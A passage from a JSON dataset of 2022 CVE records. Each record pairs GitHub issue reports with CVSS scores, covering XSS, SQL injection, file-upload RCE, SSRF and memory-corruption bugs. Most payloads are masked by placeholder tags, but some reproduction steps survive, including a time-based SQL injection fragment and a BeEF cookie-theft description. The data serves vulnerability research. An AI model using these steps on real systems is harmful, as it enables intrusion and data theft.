NUMBERTAG redirect to the malicious domain. Screenshots FILETAG FILETAG",
  81220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81221. "severity": "MEDIUM",
  81222. "baseScore": 5.4,
  81223. "impactScore": 2.7,
  81224. "exploitabilityScore": 2.3
  81225. },
  81226. {
  81227. "CVE_ID": "CVE-2022-27111",
  81228. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/32",
  81229. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/32",
  81230. "Repo_new": "jflyfox/jfinal_cms",
  81231. "Issue_Created_At": "2022-03-10T14:43:57Z",
  81232. "description": "A stored XSS vulnerability in the feedback function module of jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the feedback function module of jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the feedback of jfinal_cms. An attacker can insert malicious XSS code into the feedback content. When the administrator views the feedback list in the background, the malicious XSS code is successfully triggered. First register for a user test, then enter the feedback page, insert malicious XSS attack code in the feedback content: Payload : APITAG APITAG Then, when the administrator views the feedback in the background, the malicious XSS code is successfully triggered, and there is no need to click on the corresponding feedback, it can be triggered only on the list page. FILETAG Administrators view the feedback list: FILETAG Successfully executed malicious XSS code: FILETAG Safety advice: Strictly filter the user's input Strict control of page rendering content",
  81233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81234. "severity": "MEDIUM",
  81235. "baseScore": 5.4,
  81236. "impactScore": 2.7,
  81237. "exploitabilityScore": 2.3
  81238. },
  81239. {
  81240. "CVE_ID": "CVE-2022-27114",
  81241. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/471",
  81242. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/471",
  81243. "Repo_new": "michaelrsweet/htmldoc",
  81244. "Issue_Created_At": "2022-03-10T05:57:25Z",
  81245. "description": "Two Integer Overflow bugs in APITAG Hi, there is two integer overflow bugs in the latest version of htmldoc. They are similar to CVETAG CVETAG . os: ubuntu NUMBERTAG ersion NUMBERTAG the latest) First First, in image_load_jpeg function, APITAG When it calls malloc\uff0c'img >width' and 'img >height' are enough large to cause an integer overflow So, the malloc function may return a heap block smaller than the expected size, and it will cause a buffer APITAG boundary error in the jpeg_read_scanlines function. URLTAG URLTAG Asan report: ERRORTAG And this is the poc file\uff1a FILETAG Second There is another integer overflow bug in image_load_png function, APITAG similar to the first one. URLTAG It calls calloc to get heap block. However, the width and height of the png file are both four bytes long, so 'img >width' and 'img >height' are enough large to cause an integer overflow. The calloc function may return a heap block smaller than the expected size, and finally cause a heap overflow in the png_read_rows function when memcpy. This is the Asan report: ERRORTAG And this is the poc file: FILETAG",
  81246. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81247. "severity": "MEDIUM",
  81248. "baseScore": 5.5,
  81249. "impactScore": 3.6,
  81250. "exploitabilityScore": 1.8
  81251. },
  81252. {
  81253. "CVE_ID": "CVE-2022-27115",
  81254. "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3458",
  81255. "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3458",
  81256. "Repo_new": "studio-42/elfinder",
  81257. "Issue_Created_At": "2022-02-20T17:25:31Z",
  81258. "description": "Filename bypass leading to RCE. Describe the bug Filename bypass leading to Remote Code Execution To Reproduce Steps to reproduce the behavior NUMBERTAG Upload a file with APITAG named FILETAG , Note: the letter 'a' at the beginning of the content cannot be omitted NUMBERTAG Add two dots after the file name like this APITAG NUMBERTAG The shell file is successfully uploaded by bypassing detection and can be accessed via APITAG NUMBERTAG This vulnerability can only be exploited on windows systems. Screenshots FILETAG Desktop (please complete the following information): OS: Windows",
  81259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81260. "severity": "CRITICAL",
  81261. "baseScore": 9.8,
  81262. "impactScore": 5.9,
  81263. "exploitabilityScore": 3.9
  81264. },
  81265. {
  81266. "CVE_ID": "CVE-2022-27145",
  81267. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2108",
  81268. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2108",
  81269. "Repo_new": "gpac/gpac",
  81270. "Issue_Created_At": "2022-02-08T04:22:07Z",
  81271. "description": "There is a statck overflow detected by APITAG Description There is a statck overflow detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
  81272. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81273. "severity": "MEDIUM",
  81274. "baseScore": 5.5,
  81275. "impactScore": 3.6,
  81276. "exploitabilityScore": 1.8
  81277. },
  81278. {
  81279. "CVE_ID": "CVE-2022-27146",
  81280. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2120",
  81281. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2120",
  81282. "Repo_new": "gpac/gpac",
  81283. "Issue_Created_At": "2022-02-16T11:57:40Z",
  81284. "description": "There is a heap buffer overflow detected by APITAG Description There is a heap buffer overflow detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
  81285. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81286. "severity": "MEDIUM",
  81287. "baseScore": 5.5,
  81288. "impactScore": 3.6,
  81289. "exploitabilityScore": 1.8
  81290. },
  81291. {
  81292. "CVE_ID": "CVE-2022-27147",
  81293. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2109",
  81294. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2109",
  81295. "Repo_new": "gpac/gpac",
  81296. "Issue_Created_At": "2022-02-08T04:23:02Z",
  81297. "description": "There is a use after free detected by APITAG Description There is a use after free detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
  81298. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81299. "severity": "MEDIUM",
  81300. "baseScore": 5.5,
  81301. "impactScore": 3.6,
  81302. "exploitabilityScore": 1.8
  81303. },
  81304. {
  81305. "CVE_ID": "CVE-2022-27148",
  81306. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2067",
  81307. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2067",
  81308. "Repo_new": "gpac/gpac",
  81309. "Issue_Created_At": "2022-01-26T05:27:46Z",
  81310. "description": "Signed integer overflow. Description There are some signed integer overflow caused runtime error and are detected by APITAG System info CODETAG Build command APITAG Crash command APITAG isma timescale NUMBERTAG out /dev/null poc_file Pocs POCs URLTAG Crash output poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG",
  81311. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81312. "severity": "MEDIUM",
  81313. "baseScore": 5.5,
  81314. "impactScore": 3.6,
  81315. "exploitabilityScore": 1.8
  81316. },
  81317. {
  81318. "CVE_ID": "CVE-2022-27156",
  81319. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/593",
  81320. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/593",
  81321. "Repo_new": "daylightstudio/fuel-cms",
  81322. "Issue_Created_At": "2022-03-13T16:39:35Z",
  81323. "description": "HTML Injection Issue. A HTML Injection issue is affecting the application. STEP NUMBERTAG FILETAG STEP NUMBERTAG FILETAG",
  81324. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81325. "severity": "MEDIUM",
  81326. "baseScore": 5.4,
  81327. "impactScore": 2.7,
  81328. "exploitabilityScore": 2.3
  81329. },
  81330. {
  81331. "CVE_ID": "CVE-2022-27161",
  81332. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/43",
  81333. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/43",
  81334. "Repo_new": "cskaza/cszcms",
  81335. "Issue_Created_At": "2022-03-14T03:38:29Z",
  81336. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81337. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81338. "severity": "CRITICAL",
  81339. "baseScore": 9.8,
  81340. "impactScore": 5.9,
  81341. "exploitabilityScore": 3.9
  81342. },
  81343. {
  81344. "CVE_ID": "CVE-2022-27162",
  81345. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/44",
  81346. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/44",
  81347. "Repo_new": "cskaza/cszcms",
  81348. "Issue_Created_At": "2022-03-14T03:39:56Z",
  81349. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81351. "severity": "CRITICAL",
  81352. "baseScore": 9.8,
  81353. "impactScore": 5.9,
  81354. "exploitabilityScore": 3.9
  81355. },
  81356. {
  81357. "CVE_ID": "CVE-2022-27163",
  81358. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/45",
  81359. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/45",
  81360. "Repo_new": "cskaza/cszcms",
  81361. "Issue_Created_At": "2022-03-14T03:44:05Z",
  81362. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81364. "severity": "CRITICAL",
  81365. "baseScore": 9.8,
  81366. "impactScore": 5.9,
  81367. "exploitabilityScore": 3.9
  81368. },
  81369. {
  81370. "CVE_ID": "CVE-2022-27164",
  81371. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/42",
  81372. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/42",
  81373. "Repo_new": "cskaza/cszcms",
  81374. "Issue_Created_At": "2022-03-14T03:37:15Z",
  81375. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81377. "severity": "CRITICAL",
  81378. "baseScore": 9.8,
  81379. "impactScore": 5.9,
  81380. "exploitabilityScore": 3.9
  81381. },
  81382. {
  81383. "CVE_ID": "CVE-2022-27165",
  81384. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/41",
  81385. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/41",
  81386. "Repo_new": "cskaza/cszcms",
  81387. "Issue_Created_At": "2022-03-14T03:35:23Z",
  81388. "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81389. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81390. "severity": "CRITICAL",
  81391. "baseScore": 9.8,
  81392. "impactScore": 5.9,
  81393. "exploitabilityScore": 3.9
  81394. },
  81395. {
  81396. "CVE_ID": "CVE-2022-27333",
  81397. "Issue_Url_old": "https://github.com/Cutegod/idcCMS/issues/1",
  81398. "Issue_Url_new": "https://github.com/cutegod/idccms/issues/1",
  81399. "Repo_new": "Cutegod/idcCMS",
  81400. "Issue_Created_At": "2022-03-15T08:04:41Z",
  81401. "description": "IDCCMS reset CMS Vulnerability . IDCCMS reset CMS Vulnerability Impact version\uff1aIDCCMS NUMBERTAG Download link\uff1a FILETAG System background administrator zone program file check non program file check FILETAG Use burp to capture packets and modify the path to access the cache / web path FILETAG FILETAG Read the current cache / web path and delete APITAG file FILETAG Deleted successfully FILETAG CMS reset can be achieved by visiting the link installation address URLTAG URLTAG FILETAG",
  81402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  81403. "severity": "HIGH",
  81404. "baseScore": 7.5,
  81405. "impactScore": 3.6,
  81406. "exploitabilityScore": 3.9
  81407. },
  81408. {
  81409. "CVE_ID": "CVE-2022-27365",
  81410. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/12",
  81411. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/12",
  81412. "Repo_new": "chshcms/cscms",
  81413. "Issue_Created_At": "2022-03-16T01:45:29Z",
  81414. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG There is a SQL blind injection vulnerability in APITAG Details Add a song after administrator login FILETAG POC CODETAG FILETAG When deleting songs in the recycle bin, construct malicious statements and implement sql injection CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG Close \"id\" to achieve blind injection, so the vulnerability exists",
  81415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81416. "severity": "HIGH",
  81417. "baseScore": 7.2,
  81418. "impactScore": 5.9,
  81419. "exploitabilityScore": 1.2
  81420. },
  81421. {
  81422. "CVE_ID": "CVE-2022-27366",
  81423. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/13",
  81424. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/13",
  81425. "Repo_new": "chshcms/cscms",
  81426. "Issue_Created_At": "2022-03-16T01:58:50Z",
  81427. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG There is a SQL blind injection vulnerability in APITAG Details Add a song after administrator login FILETAG Add songs first and then delete them into the trash FILETAG FILETAG When restoring songs in the recycle bin, construct malicious statements and implement sql injection FILETAG CODETAG The parameter \"id\" exists time blind, sleeps for NUMBERTAG seconds FILETAG construct payload CODETAG In the figure below, you can see that the first letter of the database is \"c\", so it sleeps for NUMBERTAG seconds to verify that the injection exists FILETAG FILETAG",
  81428. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81429. "severity": "HIGH",
  81430. "baseScore": 7.2,
  81431. "impactScore": 5.9,
  81432. "exploitabilityScore": 1.2
  81433. },
  81434. {
  81435. "CVE_ID": "CVE-2022-27367",
  81436. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/14",
  81437. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/14",
  81438. "Repo_new": "chshcms/cscms",
  81439. "Issue_Created_At": "2022-03-16T02:17:57Z",
  81440. "description": "SQL injection vulnerability exists in Cscms music portal system APITAG There is a SQL blind injection vulnerability in APITAG Details After the administrator is logged in, you need to add a song album FILETAG CODETAG FILETAG When deleting a song album, malicious statements can be constructed to achieve sql injection FILETAG CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG contrust payload CODETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG Close \"id\" to achieve blind injection, so the vulnerability exists",
  81441. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81442. "severity": "HIGH",
  81443. "baseScore": 7.2,
  81444. "impactScore": 5.9,
  81445. "exploitabilityScore": 1.2
  81446. },
  81447. {
  81448. "CVE_ID": "CVE-2022-27368",
  81449. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/15",
  81450. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/15",
  81451. "Repo_new": "chshcms/cscms",
  81452. "Issue_Created_At": "2022-03-16T02:25:23Z",
  81453. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Details After the administrator logs in, the following data package is constructed CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG",
  81454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81455. "severity": "HIGH",
  81456. "baseScore": 7.2,
  81457. "impactScore": 5.9,
  81458. "exploitabilityScore": 1.2
  81459. },
  81460. {
  81461. "CVE_ID": "CVE-2022-27369",
  81462. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/16",
  81463. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/16",
  81464. "Repo_new": "chshcms/cscms",
  81465. "Issue_Created_At": "2022-03-16T02:46:24Z",
  81466. "description": "SQL injection vulnerability exists in Cscms music portal system APITAG There is a SQL blind injection vulnerability in APITAG Details After the administrator is logged in, a news needs to be added FILETAG CODETAG FILETAG delete this article to trash",
  81467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81468. "severity": "HIGH",
  81469. "baseScore": 7.2,
  81470. "impactScore": 5.9,
  81471. "exploitabilityScore": 1.2
  81472. },
  81473. {
  81474. "CVE_ID": "CVE-2022-27416",
  81475. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/702",
  81476. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/702",
  81477. "Repo_new": "appneta/tcpreplay",
  81478. "Issue_Created_At": "2022-02-05T08:53:25Z",
  81479. "description": "Bug] Double free. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug Double free in tcpreplay. To Reproduce Steps to reproduce the behavior NUMBERTAG export CFLAGS=\" g fsanitize=address\" export CXXFLAGS=\" g fsanitize=address NUMBERTAG configure disable local libopts NUMBERTAG make NUMBERTAG tcprewrite i POC1 o /dev/null ASAN ERRORTAG System (please complete the following information): Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG tcprewrite V ERRORTAG Additional context Add any other context about the problem here.",
  81480. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81481. "severity": "HIGH",
  81482. "baseScore": 7.8,
  81483. "impactScore": 5.9,
  81484. "exploitabilityScore": 1.8
  81485. },
  81486. {
  81487. "CVE_ID": "CVE-2022-27418",
  81488. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/703",
  81489. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/703",
  81490. "Repo_new": "appneta/tcpreplay",
  81491. "Issue_Created_At": "2022-02-05T10:45:27Z",
  81492. "description": "Heap buffer overflow in tcpreplay. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug heap buffer overflow in tcpreplay To Reproduce Steps to reproduce the behavior NUMBERTAG export CFLAGS=\" g fsanitize=address\" export CXXFLAGS=\" g fsanitize=address NUMBERTAG configure disable local libopts NUMBERTAG make NUMBERTAG tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i lo POC NUMBERTAG FILETAG ASAN ERRORTAG System (please complete the following information): Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG Tcpreplay Version [e.g NUMBERTAG ERRORTAG",
  81493. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81494. "severity": "HIGH",
  81495. "baseScore": 7.8,
  81496. "impactScore": 5.9,
  81497. "exploitabilityScore": 1.8
  81498. },
  81499. {
  81500. "CVE_ID": "CVE-2022-27419",
  81501. "Issue_Url_old": "https://github.com/merbanan/rtl_433/issues/2012",
  81502. "Issue_Url_new": "https://github.com/merbanan/rtl_433/issues/2012",
  81503. "Repo_new": "merbanan/rtl_433",
  81504. "Issue_Created_At": "2022-03-18T01:29:06Z",
  81505. "description": "Stack based Buffer Overflow in rtl NUMBERTAG Command APITAG FILETAG ASAN CODETAG",
  81506. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81507. "severity": "MEDIUM",
  81508. "baseScore": 5.5,
  81509. "impactScore": 3.6,
  81510. "exploitabilityScore": 1.8
  81511. },
  81512. {
  81513. "CVE_ID": "CVE-2022-27420",
  81514. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/19",
  81515. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/19",
  81516. "Repo_new": "kishan0725/hospital-management-system",
  81517. "Issue_Created_At": "2022-02-11T04:00:00Z",
  81518. "description": "VULNERABLE: SQL Injection in Hospital Management System. SQL injection in FILETAG via the 'patient_contact' param. Create a request to ' FILETAG ': FILETAG Save this request to FILETAG file: FILETAG Run APITAG for the attack: APITAG FILETAG Area of concern in patientsearch.php FILETAG",
  81519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81520. "severity": "CRITICAL",
  81521. "baseScore": 9.8,
  81522. "impactScore": 5.9,
  81523. "exploitabilityScore": 3.9
  81524. },
  81525. {
  81526. "CVE_ID": "CVE-2022-27428",
  81527. "Issue_Url_old": "https://github.com/bensonarts/GalleryCMS/issues/20",
  81528. "Issue_Url_new": "https://github.com/bensonarts/gallerycms/issues/20",
  81529. "Repo_new": "bensonarts/gallerycms",
  81530. "Issue_Created_At": "2022-03-18T05:30:44Z",
  81531. "description": "NUMBERTAG stored XSS Vulnerability. Alert users who are still using the project Conditions: Common user The album name can inject XSS APITAG Introduce hook. Js of beef FILETAG XSS is triggered when the administrator goes online FILETAG Beef goes online and gets the cookie FILETAG",
  81532. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  81533. "severity": "MEDIUM",
  81534. "baseScore": 5.4,
  81535. "impactScore": 2.7,
  81536. "exploitabilityScore": 2.3
  81537. },
  81538. {
  81539. "CVE_ID": "CVE-2022-27429",
  81540. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/67",
  81541. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/67",
  81542. "Repo_new": "cherry-toto/jizhicms",
  81543. "Issue_Created_At": "2022-03-18T13:32:51Z",
  81544. "description": "NUMBERTAG SSRF Vulnerability. SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks The vulnerability is located in the background plug in download function I start a locally accessible Web service with a FILETAG file FILETAG FILETAG \u4f7f\u7528payload CODETAG See the response FILETAG Browser access APITAG FILETAG open by notepad FILETAG As with FILETAG , this was read successfully",
  81545. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81546. "severity": "CRITICAL",
  81547. "baseScore": 9.8,
  81548. "impactScore": 5.9,
  81549. "exploitabilityScore": 3.9
  81550. },
  81551. {
  81552. "CVE_ID": "CVE-2022-27431",
  81553. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/200",
  81554. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/200",
  81555. "Repo_new": "wuzhicms/wuzhicms",
  81556. "Issue_Created_At": "2022-03-18T07:58:14Z",
  81557. "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability . Vulnerability file: PATHTAG public function APITAG { if(isset($GLOBALS FILETAG The vulnerability is located in the management member > member group management list > delete operation FILETAG FILETAG",
  81558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81559. "severity": "CRITICAL",
  81560. "baseScore": 9.8,
  81561. "impactScore": 5.9,
  81562. "exploitabilityScore": 3.9
  81563. },
  81564. {
  81565. "CVE_ID": "CVE-2022-27466",
  81566. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/90",
  81567. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/90",
  81568. "Repo_new": "ming-soft/mcms",
  81569. "Issue_Created_At": "2022-03-20T06:17:38Z",
  81570. "description": "MCMS NUMBERTAG SQLI. A suspicious point was found in the FILETAG file in the lib,ms mdiy NUMBERTAG FILETAG NUMBERTAG APITAG Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in APITAG and found a call to APITAG query APITAG we can know that the suspicious injection point is APITAG and then try to inject CODETAG APITAG",
  81571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81572. "severity": "CRITICAL",
  81573. "baseScore": 9.8,
  81574. "impactScore": 5.9,
  81575. "exploitabilityScore": 3.9
  81576. },
  81577. {
  81578. "CVE_ID": "CVE-2022-27470",
  81579. "Issue_Url_old": "https://github.com/libsdl-org/SDL_ttf/issues/187",
  81580. "Issue_Url_new": "https://github.com/libsdl-org/sdl_ttf/issues/187",
  81581. "Repo_new": "libsdl-org/sdl_ttf",
  81582. "Issue_Created_At": "2022-03-19T11:11:01Z",
  81583. "description": "Arbitrary memory overwrite occurs when loading glyphs and rendering text with a malformed TTF file.. Hello, I found a vulnerability in this project. Summary Arbitrary memory overwrite occurs when loading glyphs and rendering text with a malformed TTF file. System Info Operating System: Ubuntu NUMBERTAG Detailed Description When the function APITAG is executed, it internally calls APITAG and APITAG . Since the code load and render glyph data after measuring bitmap size, if the measured size has a problem, it causes memory overflow or arbitrary memory write when rendering the data. The bitmap size of glyph affects variables xstart and ystart . And they are used to calculate the destination of APITAG . Therefore a malformed TTF file that has manipulated glyph data will result in memory corruption. If the rendered string has only characters that mapped malformed glyph data, APITAG occurs when calling APITAG . But, if the string has a character that mapped normally formed glyph data in front of the mal mapped character, the normal character is rendered with corrupted size while APITAG is normally called. So, the normal character's glyph data is overwritten to arbitrary memory addresses with corrupted xstart and ystart . The address will be heap or stack. In the below code and attached malformed TTF file, a character \"T\" has normal glyph data and a character \"S\" has malformed glyph data. Since The address of the calculated destination with xstart and ystart is not a valid memory address, a segmentation fault occurs. debugged data is below. ERRORTAG Reproduce compile the below code and run the program with a malformed TTF file. A malformed TTF file link is here URLTAG main.cpp ERRORTAG compile & run CODETAG Conclusion In my thought, the part of the responsibility for this vulnerability partially rests with APITAG Usually, opening malformed TTF file results in an error code. But in here, it doesn't. I will report this issue to APITAG However, I think it would be good to add the routine that checks the range of variables xstart and ystart before calling APITAG .",
  81584. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81585. "severity": "HIGH",
  81586. "baseScore": 7.8,
  81587. "impactScore": 5.9,
  81588. "exploitabilityScore": 1.8
  81589. },
  81590. {
  81591. "CVE_ID": "CVE-2022-27476",
